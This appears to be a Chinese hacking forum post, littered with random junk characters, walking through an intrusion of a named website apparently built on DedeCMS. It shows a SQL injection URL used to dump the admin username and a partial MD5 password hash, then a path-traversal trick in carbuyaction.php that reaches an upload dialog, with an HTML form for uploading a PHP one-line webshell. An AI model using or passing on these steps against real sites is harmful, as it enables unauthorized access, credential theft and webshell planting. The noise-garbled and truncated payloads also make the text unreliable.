①注入漏洞。6 L3 c1 r( j ?
这站 http://www.political-security.com/+ d6 u' }$ j7 M5 y+ |
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
0 @3 T2 G9 ~" I# Owww.political-security.com/data/mysql_error_trace.inc 爆后台1 m' q" Y H& O4 f, a
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
' r) W, E" L: r4 x" j5 c/ V, ~' c然后写上语句
; m2 l: d# _- u0 e) N9 k& d4 A查看管理员帐号
! A% }% t) i$ xhttp://www.political-security.co ... &membergroup=@`
7 h' F' D6 q! t3 h" c t
5 B6 V3 ?! `( W( @admin
n, b1 V5 j6 M% ?# u
2 x* x. }5 o7 o. g8 ^; z% f* v! y2 d查看管理员密码
9 N) d5 L! x! d7 m2 j http://www.political-security.co ... &membergroup=@`
" b5 J+ o7 S2 Q/ n) o+ p
% D. x2 s( l/ }8d29b1ef9f8c5a5af429; C P$ H0 f" y% _
/ O v5 d$ E1 Y k: B查看管理员密码, }, Y" z5 I% P' @
/ r4 f+ [8 f. f" g" @
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
- d! |. `) S; r# e2 [. l; V! n2 u+ F$ `
8d2+ Y# s8 c4 K9 u% b6 k. i* `" c
9b1ef9f8c5a5af42
( b, m$ e8 X; A2 [0 T8 K9
! p6 ?7 m9 g3 x5 q; P ^
9 a/ {+ T; l# \1 ycmd5没解出来 只好测试第二个方法: ^. j/ R4 R! e1 W
( v. h0 q# F& H' Z: ^
, `$ }/ ^0 x3 F4 X, b; @②上传漏洞:
: b2 j2 y9 j- B G4 w0 [
/ G: u+ N3 z- V$ T只要登陆会员中心,然后访问页面链接1 X8 ?) H! `* D+ x7 d
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
& i8 `" A7 L) N7 C
& O: i/ H9 }/ ?如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
8 s0 g8 N5 F4 @* ?( ~
# R. o, K7 @. `5 T3 {, ?7 U: C于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
2 S) A- n; {( c: r1 |3 P$ q$ [/ s; U; ^' d* @
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>% i, D. S2 X+ d; P: a y
或者
6 `: ^" r+ R6 _即可上传成功 |